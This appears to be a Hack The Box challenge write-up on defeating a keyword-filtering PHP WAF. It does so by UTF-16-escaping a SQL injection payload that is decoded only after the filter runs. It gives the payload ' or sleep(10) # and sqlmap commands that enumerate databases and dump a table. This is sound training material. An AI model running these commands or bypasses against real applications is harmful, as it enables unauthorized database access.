Waf Waf - Hack The Box Challenge

2 minute read

  2 minute read

mrburns htb

When we open the page we get:

waf waf htb 1

We can see what looks like the index.php of the page. In the script you can see that a SQL database is queried and the input of POST requests is filtered using a basic WAF (Web Application firewall), implemented through the waf() function of the db class.

waf waf htb 2

The script ends immediately when at least one of the following characters or strings is found in the input string:

[, (, *, <, =, >, |, ', &, -, @, ], select, and, or, if, by, from, where,
as, is, in, not, having

The check is not case sensitive. So this looks like vulnerable to a SQL injection.

SQL Injection

Checking what happens when we make a request with one of the words that are filtered by the waf:

curl -X POST -d '{"user":"select"}'


array(1) {
  string(6) "select"

A subsequent json_decode is performed on the input string, for what the script expects to receive JSON objects. Because decoding the string happens after the function checks waf () we can take advantage of the fact that in JSON it is possible to encode characters in UTF-16, which when decoding the JSON, will return to the format original. Let’s do a test:

Para ello haremos una peticion POST con curl la cual capturaremos con Burp Suite ( es la dirección y puerto del proxy de burp suite)

curl -X POST -d '{"user":"d"}' -x  

waf waf htb 3

Once the request is captured, we will send it to the repeater

Where we send it and we appreciate the 149 bytes of the response

waf waf htb 4

Later we will test if we can evade the waf with a sqli payload, we will use the following payload ' or sleep(10) # which we will encode it to UTF-16 since as we saw previously we will proceed to a json_decode ().

I use this unicode converter

waf waf htb 5

Now we load the payload in the request and send it:

waf waf htb 6

Where we can see that we get a 200 and that there are still 149 response bytes.

Now we will copy the request to a file putting * where we want the payload to be loaded.

waf waf htb 7

Blind SQL Injection

To obtain information in this case we will use a Blind SQL Injection and we will execute the following sqlmap command we should get the databases available:

sqlmap -r requestt.txt -tamper charunicodeescape -v 3 --batch --level=5 --risk=3 --threads=10 --technique=T --dbs --dbms=mysql

waf waf htb 8

We have five databases db_m8452, info_schema, mysql, performance_schema, sys. Let’s extract the list of tables from the database. db_m8452:

sqlmap -r requestt.txt -tamper charunicodeescape -v 3 --batch --level=5 --risk=3 --threads=10 --technique=T -D db_m8452 --tables --dbms=mysql

waf waf htb 9

The db_m8452 database has two tables, definitely_not_a_flag and notes. Now let’s dump the contents of the table definitely_not_a_flag:

sqlmap -r requestt.txt -tamper charunicodeescape -v 3 --batch --level=5 --risk=3 --threads=10 --technique=T -D db_m8452 -T definitely_not_a_flag --dump --dbms=mysql

many payloads later .. we got the flag.

waf waf htb 10